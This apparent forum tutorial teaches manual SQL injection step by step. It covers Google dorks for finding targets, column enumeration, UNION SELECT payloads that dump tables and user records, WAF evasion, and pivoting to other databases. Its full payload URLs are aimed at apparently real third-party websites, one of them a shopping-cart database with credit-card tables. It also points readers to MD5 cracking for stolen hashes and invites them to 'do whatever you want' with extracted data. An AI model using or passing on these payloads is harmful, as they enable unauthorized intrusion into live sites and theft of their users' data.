Contents - Control + F the code (S0.x)
S0.1 - Full tutorial.
S0.2 - String injection. Do you not get an error even after order by 1000?
S0.3 - WAF bypassing. Do you get 404'd when trying to use commands?
S0.4 - Do you get "Illegal mix of collations for operation 'UNION'" when trying to inject?
S0.5 - Getting data from other databases.
S0.6 - Blind SQL Injection
S0.1 - The tutorial
First of all we wil want to either find vulnerabilities on a site, or find one via dorks.
To find vulnerabilities on a site, we can use google. Type into google,
Code:
site:site.com inurl:.php?id=
If you get no results, you can try
Code:
site:site.com inurl:.php?
To find sites via dorks, it is very simple. Just type into google -
inurl:dork
For example
Code:
inurl:article.php?id=
Here is a list of dorks you could use.
http://pastebin.com/k2FFy1YH
And of course, you could come up with your own.
After we have found a vulnerable site, we will test to see if it is vunerable to SQL injection. Simply add an ' at the end of the parameter, example -
Code:
.php?id=1'
And if we get any sort of error, it MAY be vulnerable. You can check by using the order by technique.
Add order by 1-- onto the end of your URL, and if displays normally then we can move on. Else if you still get an error, chances are it is not vulnerable.
Now that we know the site is vulnerable, we will continue injecting. I have found a site for the purpose of this tutorial.
Code:
http://www.iblist.com/book.php?id=235
We add ' onto the end of the url.
Code:
http://www.iblist.com/book.php?id=235'
And we get an error. Now add
Code:
order by 1--
so
Code:
http://www.iblist.com/book.php?id=235 order by 1--
and we get no error. It's vulnerable.
Now we want to find out the number of columns. To do this there are multiple ways, but the most common are ORDER BY, and GROUP BY. They can be used in the same way.
We will add order by 1, and keep increasing the integer untill we get an error. Say we go up by one at a time, and we get an error when we hit 5. This means the site would have 4 columns.
Code:
http://www.iblist.com/book.php?id=235 order by 1--
Code:
http://www.iblist.com/book.php?id=235 order by 2--
Code:
http://www.iblist.com/book.php?id=235 order by 3-- <- No error
Code:
http://www.iblist.com/book.php?id=235 order by 4-- <- No error
Code:
http://www.iblist.com/book.php?id=235 order by 5-- <- No error
Code:
http://www.iblist.com/book.php?id=235 order by 6-- <- No error
Code:
http://www.iblist.com/book.php?id=235 order by 7-- <- No error
Code:
http://www.iblist.com/book.php?id=235 order by 8-- <- No error
Code:
http://www.iblist.com/book.php?id=235 order by 9-- <- No error
Code:
http://www.iblist.com/book.php?id=235 order by 10-- <- No error
Code:
http://www.iblist.com/book.php?id=235 order by 11-- <- No error
Code:
http://www.iblist.com/book.php?id=235 order by 12-- <- No error
Code:
http://www.iblist.com/book.php?id=235 order by 13-- <- No error
Code:
http://www.iblist.com/book.php?id=235 order by 14-- <-error
We got no error up untill 14. So we know it only has 13 columns.
Now that we know the site has 13 columns, we will find the vulnerable columns. To do this we use
Code:
UNION SELECT
or
Code:
UNION ALL SELECT
and the ammount of columns. so,
Code:
http://www.iblist.com/book.php?id=235 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Notice it still displays normally. To make it show the vulnerable columns, we have to null the parameter. You can do this by either adding a "-" before the number/text, or simply replacing it with "null".
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
It now displays the vulnerable columns.
You can use any you want, i'll use 2.
Now we want to find out the mysql version. To do this replace the column number you are working with, with either
Code:
version()
or
Code:
@@version
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14--
Ahh, it's running version 5. That's good. If it was <5 you would have to use error based injection since it doesn't have information_schema.
Now we want to find the table names.
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()--
We use group_concat to gather the table names. In brackets "table_name". We want to get it from information_schema.tables, and we want to get them from the current database (which you can also find out by replacing a vulnerable column with "user()" ).
We can now see most of the table names.
But notice how it cuts off randomly. That's because group_concat has a limit to the ammount of characters it can display. I believe it's 1024 (i may be wrong), but we can get past this.
We will use "concat" instead of group_concat, and use limit.
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database() LIMIT 0,1--
This will display one table at a time, so we can get them all. Increase limit 0,1 to limit 1,1 etc untill you have all the tables names.
After going through, I know there are 56 tables.
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database() LIMIT 56,1--
Because if i try 57,1 i get an error.
Now search through the tables untill you find something intresting, such as "admin" or "users".
Table 56 happens to be users. Note it down, incase you forget. So we will work with this, if we don't get anything usefull we will try and find another table which may contain sensitive data.
Now we want to find out the columns within that table. To do this we will raplace concat(table_name) with column_name. And replace information_schema.tables with information_schema.columns, and add the table_name="tablename" instead of table_schema.
So
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name="users"--
But we get an error. To bypass this we will have to use CHAR(charcode)
So users would be
Code:
CHAR(117, 115, 101, 114, 115)
I'd suggest using HackBar to convert it. It is a nifty little addon for firefox.
But it still displays no data. Maybe the column is empty? To find out use "count"
And derp, it returned 0.. fail on my behalf. I was writing this tutorial in real time.
So we will gather data from another table, just so I can show how you do it.
I found another table, it doesn't contain that much useful data, but for the purposes of the tutorial I will show you how to extract data from a table :D
The table I found was "puser"
so
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=CHAR(112, 117, 115, 101, 114)--
And we get.
Code:
id,username
To extract this data we will have to do group_concat(columns) from table
So
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,group_concat(id,username),3,4,5,6,7,8,9,10,11,12,13,14 from puser--
But it looks terribad, not layed out right and hard to tell them apart.
So we will add some hexdecimal values for a line break, and a semi colon.
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,group_concat(id,0x3a,username,0x0a),3,4,5,6,7,8,9,10,11,12,13,14 from puser--
0x3a = :
0x0a = line break
Easier to tell them apart now :) And again, if you can't see them all you can use concat and limit.
If you want to find the username for a specific ID, viceversa, you can use
Code:
http://www.iblist.com/book.php?id=null UNION SELECT 1,group_concat(id,0x3a,username,0x0a),3,4,5,6,7,8,9,10,11,12,13,14 from puser where id=1--
Now that you have this data, you can do whatever you want with it. Unfortunatley this didn't conain any passwords, but now you know hot to extract the column data if there is a passwords column. If it comes out as a long string of letters, it is most likely an MD5 hash. To crack it you can either download MDBruter, or any other MD5 bruteforcer, or see if it has already been cracked by going to
http://hashchecker.de/find.html
S0.2 - String Injection
If you're trying to find out the number of columns for a site, yet when you do order by 999 you don't get an error, you should try string injection next. To do this simply add
--+
+--+
+--
instead of
--
onto the end of your url, and add an apostrophe " ' " ontot the end of the parameter, so it would look like
Code:
www.site.com/example.php?id=1 order by 999--
Code:
www.site.com/example.php?id=1' order by 999--+
I hope you enjoyed my tutorial, and that I may have taught you some basics if you are new to SQL injection.
:)
S0.3 - WAF Bypassing
If you're fine injecting, up untill the point when you try "UNION SELECT" and you get 404'd, then chances are the site has a Web Application Firewall (WAF).
This block out nasty SQL commands that could be a potential threat to the site.
If you're injecting, and you run across this, it is very simple to bypass. There are a few methods, examples -
Alternating between Capitalised/Non-Capitalised.
Code:
http://site.com/example.php?id=null UnIOn SelECT 1,2,3,4,5--
Using comment tags
Code:
/*!*/
Code:
http://site.com/example.php?id=null /*!UNION*/ /*!SELECT*/ 1,2,3,4,5--
Some of the more notable commands/phrases it blocks out in a standard injection are -
Code:
UNION
SELECT
GROUP_CONCAT
CONCAT
INFORMATION_SCHEMA
TABLE_SCHEMA
Note, to you can't bypass group_concat, so you have to use /*!Concat*/ to select one at a time. And at the end of the injection, before the --'s add LIMIT 0,1 and keep increasing it by 1 to see each value.
S0.4 - Illegal mix of collations for operation 'UNION'
This is a common error that alot of people get. Normally when people are trying to use "group_concat", or "version()" etc. Alot of the time when people get this error they think the site isn't injectable, and just give up and go find a new site. Well it's easy to get past this. All you have to do it unhex a hex'd command. For example
Code:
group_concat(unhex(hex(table_name)))
Example on a site -
Code:
http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT 1,2,group_concat(unhex(hex(table_name))) from /*!information_schema*/.tables where table_schema=database()--
You can also use "convert".
Code:
group_concat(CONVERT(table_name USING latin1))
Code:
http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT 1,2,group_concat(CONVERT(table_name USING latin1)) from /*!information_schema*/.tables where table_schema=database()--
And the following:
uncompress(compress(version()))
cast(version() as char)
aes_decrypt(aes_encrypt(version(),1),1)
binary(version())
CONVERT(version() USING x)
x = charset, for example
ascii
binary
latin1
utf8
S0.5 - Getting data from other DBs'
Have you ever gone through all the trouble of injecting a site just to find that there are no user tables? Well chances are there might be, although there might not be. But we will find out how to go by this, by looking in other databases on the site.
First of all we will need to find the current databases. To do this you will use this -
Code:
group_concat(schema_name) from information_schema.schemata
Example on a site -
Code:
http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT 1,2,group_concat(CONVERT(schema_name USING latin1)) from /*!information_schema*/.schemata--
Now that we have the database names, you will have to go through them and find the one you want. You might not get them all, since group_concat has a 1024 character limit, but you could always use concat and limit, and go through them 1 by 1.
For simplicity I will use the first DB in there. "CCS_Shopping_Carts". We will do the usual "group_concat(table_name)". But where we normally put "where table_schema=database()", we will add the database we want. You will need to hex the DB, and add "0x" onto the front of it. You can hex it using any string to hexdecimal converter - http://www.string-functions.com/string-hex.aspx - or using the built in one on hackbar.
Example -
Code:
http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT 1,2,group_concat(CONVERT(table_name USING latin1)) from /*!information_schema*/.tables where table_schema=0x4343535f53686f7070696e675f4361727473--
Now to get the columns, it's just the same really.
Code:
http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT 1,2,group_concat(CONVERT(column_name USING latin1)) from /*!information_schema*/.columns where table_name=0x61636365707465645f6361726473--
And finally to get the data, you want to specify the database name and the table name like, databasename.table. Note if you're using unhex(hex()) or convert, it won't work. Just use group_concat, and it will :).
Code:
http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT 1,2,group_concat(accepted_cards_id,0x3a,cart_id,0x3a,credit_card_id,0x0a) from CCS_Shopping_Carts.accepted_cards--
And there we go :).
0 comments:
Post a Comment